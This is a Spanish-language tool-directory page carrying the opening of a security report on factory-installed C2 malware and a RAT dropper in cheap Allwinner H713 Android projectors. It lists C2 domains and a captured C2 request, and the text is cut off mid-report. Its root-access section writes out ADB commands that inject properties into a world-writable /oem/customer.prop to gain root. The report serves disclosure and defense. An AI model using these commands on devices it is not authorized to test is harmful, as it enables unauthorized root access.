Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Android-Projector-C2-Malware — Desglose de un c2-network de beamers chinos - SilentSDK-Analysis | Kitploit
Herramientas/GitHubGitHub/kavan00/android-projector-c2-malware
Seguridad AndroidSeguridad de Sistemas EmbebidosGestión de Indicadores de Compromiso (IOC)Seguridad IoTForensia de RedIngeniería InversaAnálisis de MalwareForensia DigitalComando y Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Inteligencia de Amenazas
Seguridad de Cadena de Suministro
Análisis de Firmware
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

Desglose de un c2-network de beamers chinos - SilentSDK-Analysis

Ver Repositorio
18265hace 5 mesesAún no revisado
Compartir

Infraestructura C2 Preinstalada y Payload RAT en Proyectores Android

Informe de Análisis Técnico — Investigación de Seguridad


Dispositivos Afectados: Múltiples proyectores Android de marcas como Nonete (p. ej., modelo HY260Pro) (probablemente también varios proyectores de Magcubic, Hotack, Huyukang y muchos más, ya que estas empresas distribuyen modelos similares y hay indicios que lo respaldan)
Plataforma de Chipset: Allwinner H713 / sun50iw12p1 — potencialmente afecta a todos los dispositivos en esta plataforma
Período de Análisis: 11–17 de abril de 2026
Clasificación: Infraestructura de Comando y Control preinstalada con payload de Troyano de Acceso Remoto


TL;DR

  • El Problema: Numerosos proyectores Android baratos (potencialmente marcas como Magcubic, Hotack, etc., que utilizan el chip Allwinner H713), actualmente vendidos en grandes cantidades en Amazon, eBay y AliExpress, están infectados con malware directamente desde la fábrica (Ataque a la Cadena de Suministro, similar a los casos "BADBOX").
  • El Mecanismo: Una aplicación del sistema aparentemente inofensiva ("StoreOS") actúa como un dropper disfrazado. Descarga silenciosamente un Dropper de Etapa 2 llamado "SilentSDK" en segundo plano y lo instala con privilegios máximos del sistema, que a su vez instala un framework RAT modular, basado en plugins y consciente de la arquitectura, y posiblemente un framework de phishing.
  • El Peligro: El malware establece una conexión C2 con China (api.pixelpioneerss.com), extrae IDs de dispositivo sensibles y puede descargar y ejecutar código malicioso adicional arbitrario con privilegios de root en cualquier momento (chmod 777). Además, los dispositivos presentan puertas traseras de root abiertas.
  • Mitigación Inmediata: Los dominios C2 (especialmente *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) deben bloquearse a nivel de red. Los usuarios afectados solo pueden deshabilitar las aplicaciones maliciosas manualmente mediante ADB, ya que están profundamente incrustadas en el sistema.

Aviso de Urgencia

La infraestructura de malware documentada en este informe está preinstalada en proyectores Android que se venden actualmente en grandes cantidades a consumidores finales en Amazon, eBay y AliExpress. Los dispositivos afectados abarcan posiblemente múltiples nombres de marca (Hotack, Huyukang, Magcubic, Nonete, entre otros). Se ha confirmado de forma independiente una infraestructura C2 idéntica en otros dispositivos del mismo fabricante (ver Sección 13). El patrón coincide con los casos BADBOX.


Tabla de Contenidos

  1. Identificación del Dispositivo
  2. Flujo de Trabajo de la Investigación
  3. Acceso Root — Ruta de Explotación
  4. Respuesta del Servidor C2 — Evidencia Central
  5. Visión General del Ecosistema del Malware
  6. StoreOS — Análisis del Dropper (com.htc.storeos)
  7. EventUploadService — Telemetría (com.htc.eventuploadservice)
  8. ExpandSDK — Inyección de Anuncios (com.htc.expandsdk)
  9. SilentSDK — Análisis del Dropper de Etapa 2 (com.hotack.silentsdk)
  10. El Malware
  11. Puertas Traseras del Sistema
  12. Forense de Red
  13. Suplantación del Dispositivo (Suplantación de Build Fingerprint)
  14. Confirmación Externa
  15. Indicadores de Compromiso (IOCs)
  16. Mapeo MITRE ATT&CK
  17. Mitigaciones Inmediatas
  18. Fuentes

Dispositivo Comprado: Enlace de Amazon - Nonete Mini Beamer 4K 1080P


1. Identificación del Dispositivo

PropiedadValor
Nombre de MarcaNonete HY260Pro (modelo vendido por múltiples empresas)
Nombre del Modelo InternoNT10
SoCAllwinner sun50iw12p1 (ARM 32 bits)
Sistema OperativoSpectraOS (Android 11, Kernel 5.4.99)
Build Fingerprint RealAllwinner/h713_tuna_p3/h713-tuna_p3:11
Build Fingerprint SuplantadoADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermisivo (sin aplicación de políticas)
Clave de Firma de PlataformaClave de Prueba Pública de AOSP
Certificado OEMCN=蓝鲨, OU=www.bsh.me, C=CN
Canal de FirmwareHY260Pro_SpectraOS_TPYB

Nota sobre el alcance: El chipset Allwinner H713 está incorporado en numerosos proyectores Android baratos vendidos bajo nombres de marca cambiantes en el mercado europeo. La misma base de firmware (h713_tuna_p3) y el mismo operador C2 (Shenzhen Aodin Technology) sugieren fuertemente que todos los dispositivos de este OEM contienen la misma infraestructura.


2. Flujo de Trabajo de la Investigación

PasoAcciónResultado
1Captura de tráfico de red con WiresharkTráfico HTTP a store-api.aodintech.com
2Decodificación de la respuesta C2 comprimida con gzip7 aplicaciones, incluyendo "SilentTools" oculta
3Descifrado AES-CBC de la ruta de descargaClave [REDACTED], URL al archivo .bpp
4Explotación de root mediante /oem/customer.propuid=0(root) tras inyección de propiedades
5Volcado forense de /data, /oem, /systemAPKs, bases de datos, configuraciones
6Análisis estático de StoreOS DEXpm install -r -d, protección por inversión de bytes
7Ingeniería inversa del mecanismo reverseLenComprensión de la protección anti-análisis
8Rotura de la protección por inversión de bytesDEX de SilentSDK descifrado y analizable
9Descifrado XOR de cadenas de SilentSDKDominio C2 api.pixelpioneerss.com confirmado
10Verificación de hash en tres fuentesMD5/SHA-256 coinciden perfectamente
11Ingeniería inversa del proceso de descarga del malwareServidores aún en línea
12Ingeniería inversa del malwareFramework RAT basado en plugins

3. Acceso Root — Ruta de Explotación

El acceso root se logró mediante una combinación de tres vulnerabilidades:

  1. SELinux Permisivo — Las violaciones de acceso solo se registran, no se bloquean.
  2. /oem escribible por cualquier usuario — La partición está montada como FAT con fmask=0000.
  3. customer.prop cargado al arrancar — Sobrescribe propiedades del sistema.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**Impacto:** Cualquier usuario con acceso físico o un atacante en la misma red (a través de ADB, puerto 5555 abierto, sin autenticación) obtiene acceso completo como root.

---

## 4. Respuesta del Servidor C2 — Evidencia Principal

### Solicitud HTTP Capturada```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

Respuesta del servidor (Decodificada desde pcapng - Tabla)

La respuesta comprimida con gzip contiene una lista JSON con siete aplicaciones. Seis de ellas son aplicaciones de streaming normales (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). La séptima es SilentTools:

Descargar herramienta